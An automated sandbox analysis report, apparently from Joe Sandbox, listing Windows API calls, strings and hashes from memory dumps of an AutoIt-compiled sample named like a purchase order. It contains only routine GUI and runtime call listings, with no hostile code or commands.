                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                                      • Opcode ID: c655ef112de186f858fd53f182a34cedddeea54428e8a146943ae00af5ea0fb5
                                                                                                                                                                                                      • Instruction ID: 53d84e717a84cd646c9bb37dc5a0418975d314d2cf4d1fc3b1c59ead6aebad59
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c655ef112de186f858fd53f182a34cedddeea54428e8a146943ae00af5ea0fb5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29029C71900108AFDB14DFA5CD88EAE7BB9FF49315F008669F905AB2A2C734DD45CB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0046D2DB
                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0046D30C
                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0046D318
                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0046D332
                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0046D341
                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0046D36C
                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 0046D374
                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0046D37B
                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 0046D38A
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0046D391
                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0046D3DC
                                                                                                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 0046D40E
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0046D439
                                                                                                                                                                                                        • Part of subcall function 0046D575: GetSysColor.USER32(00000012), ref: 0046D5AE
                                                                                                                                                                                                        • Part of subcall function 0046D575: SetTextColor.GDI32(?,?), ref: 0046D5B2
                                                                                                                                                                                                        • Part of subcall function 0046D575: GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
                                                                                                                                                                                                        • Part of subcall function 0046D575: GetSysColor.USER32(0000000F), ref: 0046D5D3
                                                                                                                                                                                                        • Part of subcall function 0046D575: GetSysColor.USER32(00000011), ref: 0046D5F0
                                                                                                                                                                                                        • Part of subcall function 0046D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
                                                                                                                                                                                                        • Part of subcall function 0046D575: SelectObject.GDI32(?,00000000), ref: 0046D60F
                                                                                                                                                                                                        • Part of subcall function 0046D575: SetBkColor.GDI32(?,00000000), ref: 0046D618
                                                                                                                                                                                                        • Part of subcall function 0046D575: SelectObject.GDI32(?,?), ref: 0046D625
                                                                                                                                                                                                        • Part of subcall function 0046D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
                                                                                                                                                                                                        • Part of subcall function 0046D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
                                                                                                                                                                                                        • Part of subcall function 0046D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
                                                                                                                                                                                                        • Part of subcall function 0046D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3521893082-0
                                                                                                                                                                                                      • Opcode ID: b9fc4010df688c53206ee3d8536c12a272738b95772e264f5af44db37216222e
                                                                                                                                                                                                      • Instruction ID: fc64aee0f8033bc08b65d9275a05176ebd0246f14ea06a4dbed0e4f224444525
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9fc4010df688c53206ee3d8536c12a272738b95772e264f5af44db37216222e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06918C71909301BFCB10AF64DC48E6F7BA9FF89325F100A2EF962961E0D735D9448B5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 0041B98B
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041B9CD
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041B9D8
                                                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0041B9E3
                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0041B9EE
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0047D2AA
                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0047D2E3
                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0047D711
                                                                                                                                                                                                        • Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0047D758
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0047D76F
                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 0047D785
                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 0047D790
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                                                                                                      • Opcode ID: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
                                                                                                                                                                                                      • Instruction ID: 1b00305283755ee8e1f68ab188fd9dc62ffc5e41ef1510419ecd282818b9119d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2128D70914201AFDB15CF24C884BEABBF5FF45304F14856EE989DB252C739E882CB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                                                                                                      • Opcode ID: 04142dc542e498ef1dc1ce7213834fed4f42303091bcc503bccc4d31e210c057
                                                                                                                                                                                                      • Instruction ID: 06179b6bf307cae3cf48bf65e9d4e0c3680e96e7f80719158496d28e555dcc9d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04142dc542e498ef1dc1ce7213834fed4f42303091bcc503bccc4d31e210c057
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B081F770640215BADB20AB65DDC2FEB3B68AF24344F14413FF909761C6EABC9945C2AD
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0046C788
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0046C83E
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 0046C859
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0046CB15
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 2326795674-4108050209
                                                                                                                                                                                                      • Opcode ID: cb305e246e9808962085cd307d7770feb3073be77f7200dbf61d466a01f4aab1
                                                                                                                                                                                                      • Instruction ID: f09e5bb1ad1c00c77308f307c9b90b32b86210494ba77bfe049ff4a6769cfe2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb305e246e9808962085cd307d7770feb3073be77f7200dbf61d466a01f4aab1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F1C270605301ABD7218F24C885BBBBBE4FF49714F08092EF5D8962A1E778D845DB9B
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,0049DC00), ref: 00466449
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                                                      • API String ID: 3964851224-45149045
                                                                                                                                                                                                      • Opcode ID: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
                                                                                                                                                                                                      • Instruction ID: bf06782b9b2ecba1bbd79463fd2e0cebf5d6bb80645d400e677d0eaac971ff05
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDC144342042469BCA04EF12C551AAE7795AF94348F05486FF88557393EB3CED4ACB9F
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 0046D5AE
                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0046D5B2
                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0046D5D3
                                                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 0046D5D8
                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 0046D5F0
                                                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0046D60F
                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0046D618
                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0046D625
                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
                                                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698
                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0046D6BF
                                                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0046D6DD
                                                                                                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 0046D6E8
                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 0046D6F6
                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0046D6FE
                                                                                                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0046D712
                                                                                                                                                                                                      • SelectObject.GDI32(?,0046D2A5), ref: 0046D729
                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0046D734
                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0046D73A
                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0046D73F
                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0046D745
                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0046D74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                                                      • Opcode ID: c43565668126191cd8f2392aa243306caff2100be95ff8e1f24bf8bdd047f677
                                                                                                                                                                                                      • Instruction ID: 2e03f9327eeab2d40ca4f816ed687680e735fa5ad21fcb0366a83fd56a694508
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c43565668126191cd8f2392aa243306caff2100be95ff8e1f24bf8bdd047f677
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8512A71D01218BFDF10AFA8DC48EAE7BB9EF08324F10452AF915AB2E1D7759A409F54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0046B7B0
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B7C1
                                                                                                                                                                                                      • CharNextW.USER32(0000014E), ref: 0046B7F0
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0046B831
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0046B847
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B858
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0046B875
                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0046B8C7
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0046B8DD
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0046B90E
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046B933
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0046B97C
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046B9DB
                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0046BA05
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0046BA5D
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0046BB0A
                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0046BB2C
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 0046BB76
                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046BBA3
                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 0046BBB2
                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0046BBDA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                                                                                                      • Opcode ID: 1f2fedc8b8249f8d7d8d174c884dee1b2224e4b6ae731d9412bffa098fcaa608
                                                                                                                                                                                                      • Instruction ID: 105667823e2cecf89bff1c6361f5e2b3764f8dc26707848e41da29b8269f068d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f2fedc8b8249f8d7d8d174c884dee1b2224e4b6ae731d9412bffa098fcaa608
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE191B4900218ABDB109F55CC84EEF7B78EF05714F10816BF915EA291E7789981CFAA
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Foreground
                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASS$H+K$HANDLE$INSTANCE$L+K$LAST$P+K$REGEXPCLASS$REGEXPTITLE$T+K$TITLE
                                                                                                                                                                                                      • API String ID: 62970417-967414542
                                                                                                                                                                                                      • Opcode ID: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
                                                                                                                                                                                                      • Instruction ID: 19b6f70e54dbd00de2fe89bce1193ca9c500e92799cd443801b945e85138c81e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29D1B9305086439BCB04DF21CA419DABBA4FF54344F00892FF459671E2DB78E99ADBD9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0046778A
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0046779F
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004677A6
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00467808
                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00467834
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0046785D
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046787B
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004678A1
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004678B6
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004678C9
                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004678E9
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00467904
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00467918
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00467930
                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00467956
                                                                                                                                                                                                      • GetMonitorInfoW.USER32 ref: 00467970
                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00467987
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 004679F2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
